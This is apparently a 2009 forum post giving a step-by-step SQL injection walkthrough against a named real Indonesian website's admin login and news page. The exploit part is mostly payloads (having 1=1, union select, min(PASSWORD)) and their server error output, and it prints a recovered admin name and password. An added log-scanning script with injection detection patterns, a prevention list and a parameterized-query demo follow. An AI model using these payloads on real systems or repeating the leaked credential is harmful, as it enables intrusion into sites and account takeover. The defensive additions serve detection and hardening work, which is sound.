Breaking the Web with Step-by-Step SQL Injection
Submitted by ArBoy on Sun, 18/10/2009 - 15:54
As of March 2006 there was still a web site in the Republic of Indonesia that could be broken with SQL injection techniques. Do you know how dangerous this one bug is? Here we present SQL injection step by step, taken directly from the writings of iko (iko94@yahoo.com).
We take the easiest route first: the input box. We look for an admin login box, and find one at www.pln-wilkaltim.co.id/sipm/admin/admin.asp
The first step is to determine the table name and its fields. We inject the NIP box with this command (the password field can be anything, just leave it):
' having 1=1 --
Do not forget to write the single quote and the double hyphen (important). The meaning of those two characters can be found in the SQL Injection tutorial on www.neoteker.or.id (see the archives above).
The following error message then comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
-------
Our first field name comes out!
Note the table name: T_ADMIN
Note the field name: NOMOR
Next we inject:
' union select sum(NIP) from T_ADMIN --
The error message that comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] The sum
or average aggregate operation can not take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
-------
This means the NIP column is of type char.
We repeat the command above for each following column, replacing nama_kolom in:
' union select sum(nama_kolom) from T_ADMIN --
with the name of the next column.
We end up with 7 columns and their types:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Next we inject:
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA='bill' --
Note: this must be written on one line (not broken).
The error that comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax
error converting the nvarchar value 'm @ mpusk @ u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
-------
This means we succeeded!
We get:
[+] NAMA = bill
[+] PASSWORD = m @ mpusk @ u
Then we inject:
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN where NAMA='bill' --
Note: this must be on a single line.
Duarrrrrr ...
Glhodhak ...
Straight into the admin menu.
Remember: do no damage! Tell the admin!
We also inject:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1 --
The error message that comes out:
---------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------
This means tb_news is the table name and NewsId its first column.
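As an added example (not part of the original write-up), here is a small log triage script that flags the probes shown above when they appear in constructed IIS-style log lines; the log format, the sample entries and the file names are assumptions, and the script also notes that a login form posted to dologin.asp leaves only a 500 status in the web log, since POST bodies are not logged.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (date time method uri-stem uri-query status).
# Made-up samples echoing the probes in the write-up; not real logs.
SAMPLE_LOG = """\
2006-03-01 10:15:22 GET /dari_Media.asp id=2119 200
2006-03-01 10:15:40 GET /dari_Media.asp id=2119'+having+1=1+-- 500
2006-03-01 10:16:05 POST /sipm/admin/dologin.asp - 500
2006-03-01 10:16:30 GET /dari_Media.asp id=2119'+union+select+sum(NIP)+from+T_ADMIN+-- 500
2006-03-01 10:17:01 GET /index.asp - 200
"""

# Patterns drawn from the write-up: a quote followed by HAVING 1=1, a quote
# followed by UNION SELECT, and the "--" comment terminator at the end.
INJECTION_PATTERNS = [
    ("having-probe", re.compile(r"'\s*having\s+1\s*=\s*1", re.I)),
    ("union-select", re.compile(r"'\s*union\s+select\b", re.I)),
    ("comment-terminator", re.compile(r"--\s*$")),
]

def classify_line(line):
    """Return (uri_stem, reason) for a suspicious log line, or None."""
    parts = line.split()
    if len(parts) != 6:
        return None
    _date, _time, method, stem, query, status = parts
    decoded = unquote_plus(query)  # '+' and %xx back to the text the server saw
    hits = [name for name, rx in INJECTION_PATTERNS if rx.search(decoded)]
    if hits:
        return (stem, "payload:" + ",".join(hits))
    # POST bodies are not written to the IIS log, so an injected login form only
    # shows up as a 500 from the handler (dologin.asp, line 7 in the write-up).
    if method == "POST" and status == "500" and stem.endswith(".asp"):
        return (stem, "post-500-no-body")
    return None

def scan(log_text):
    """Return (line_no, uri_stem, reason) for every suspicious line in the log."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        result = classify_line(line)
        if result:
            findings.append((n, result[0], result[1]))
    return findings

if __name__ == "__main__":
    for n, stem, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {stem} -> {reason}")
```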
******************************************************
SPECIAL FOR ADMINS & WEB PROGRAMMERS!
******************************************************
Common ways to prevent this:
1. Limit the length of the input box (if possible) by enforcing the limit in the
program code, so that beginner crackers are confused for a moment when they see
that the input box cannot be injected with a long command.
2. Filter the input entered by the user, especially single quotes (input validation).
3. Turn off or hide the error messages that come out of the running SQL Server.
4. Turn off standard facilities such as stored procedures and extended stored
procedures, if possible.
5. Change "Startup and run SQL Server" to use a low-privilege user, in the SQL
Server Security tab.
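Added example, not from the original post: the login query built by string concatenation (the construction that lets the NIP-box probe above become part of the SQL) beside a parameterized version that keeps the same input as plain data and hides driver errors from the client (item 3). It uses SQLite in place of SQL Server so it runs offline; the table contents are constructed, and the parameterized query goes beyond the list above, which does not mention it.

```python
import sqlite3

# Constructed stand-in for the T_ADMIN table from the write-up (SQLite instead of
# SQL Server). Column names follow the page; the row values are made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE T_ADMIN (NOMOR INTEGER, NIP TEXT, PASSWORD TEXT, NAMA TEXT)")
    conn.execute("INSERT INTO T_ADMIN VALUES (1, '12345', 'example-secret', 'bill')")
    conn.commit()
    return conn

# The text typed into the NIP box in the write-up's first step.
NIP_PROBE = "' having 1=1 --"

def build_login_query_concat(nip, password):
    """The construction dologin.asp evidently uses: input pasted into SQL text, so a
    quote in the NIP box closes the string literal and the rest is parsed as SQL."""
    return ("SELECT NOMOR FROM T_ADMIN WHERE NIP = '" + nip
            + "' AND PASSWORD = '" + password + "'")

def login_parameterized(conn, nip, password):
    """Hardened version: placeholders bind the input as data. Returns NOMOR or None.
    Driver errors are kept server-side instead of being echoed to the browser."""
    try:
        row = conn.execute(
            "SELECT NOMOR FROM T_ADMIN WHERE NIP = ? AND PASSWORD = ?",
            (nip, password),
        ).fetchone()
    except sqlite3.Error as exc:
        print("login query failed (details logged server-side):", type(exc).__name__)
        return None
    return row[0] if row else None

def demo():
    """Returns (concatenated SQL, result for the probe, result for real credentials)."""
    conn = make_db()
    sql = build_login_query_concat(NIP_PROBE, "anything")
    print("concatenated SQL that would reach the server:\n  " + sql)
    # The probe is now part of the statement, which is why SQL Server answered with
    # the column-name error quoted earlier; the parameterized form just finds no row.
    probe_result = login_parameterized(conn, NIP_PROBE, "anything")
    real_result = login_parameterized(conn, "12345", "example-secret")
    print("parameterized login with probe ->", probe_result)
    print("parameterized login with real credentials ->", real_result)
    return sql, probe_result, real_result

if __name__ == "__main__":
    demo()
```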
crazy ..
First, bro!
Hahaha